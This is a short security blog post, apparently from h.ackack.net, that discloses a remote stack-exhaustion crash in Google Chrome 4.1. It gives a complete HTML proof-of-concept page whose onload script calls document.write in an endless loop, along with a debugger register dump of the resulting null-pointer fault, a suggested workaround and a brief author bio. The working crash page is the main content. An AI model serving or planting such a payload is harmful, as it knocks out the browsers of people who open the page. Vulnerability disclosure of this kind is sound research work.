Google Chrome remote stack exhaustion in chrome.dll
After first finding this exploit i tested it a couple of times, what turns out is that it sometimes works and sometimes the "wait" or "close page" dialog box pops up, sometimes the stack exhaustion will still trigger after requesting to close the window and sometimes it just won't work, pretty random in my opinion but by opening a couple of tabs to the code should perfectly do the job.
I tested this on a machine with the following specs:
x86 XP SP3 virtual box with 512 MB base memory and Google Chrome 4.1.249.1064
Here is the exploit code:
<html>
<head>
<title>
Google Chrome remote stack exhaustion in chrome.dll;
published at http://h.ackack.net;
found by: Jelmer de Hen
</title>
<script>
// Open it a couple of times, it might not always work;
// see http://h.ackack.net/?p=323 for more information
function pataboom(){
while(1){
document.write("<acronym>");
}
}
</script>
</head>
<body onload="pataboom();"></body>
</html>
And here is a dump of the registers:
eax=00000000 ebx=0000041a ecx=01010101 edx=f5d4a8f0 esi=0012f3f8 edi=00000233
eip=01ddc905 esp=0012f348 ebp=0012f34c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Documents and Settings\owner\Local Settings\Application Data\Google\Chrome\Application\4.1.249.1064\chrome.dll -
chrome_1c30000!ChromeMain+0x1a9685:
01ddc905 a200000000 mov byte ptr ds:[00000000h],al ds:0023:00000000=??
As temporary patch i would suggest to not open links you don't trust and turn off JavaScript, i think that since Google is good at patching will bring out a patch very soon.
13 Comments
-
-
-
-
Jelmer de Hen says:
You are right, i edited it; thanks for the input
-
-
-
-
-
-
-
-
-
Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.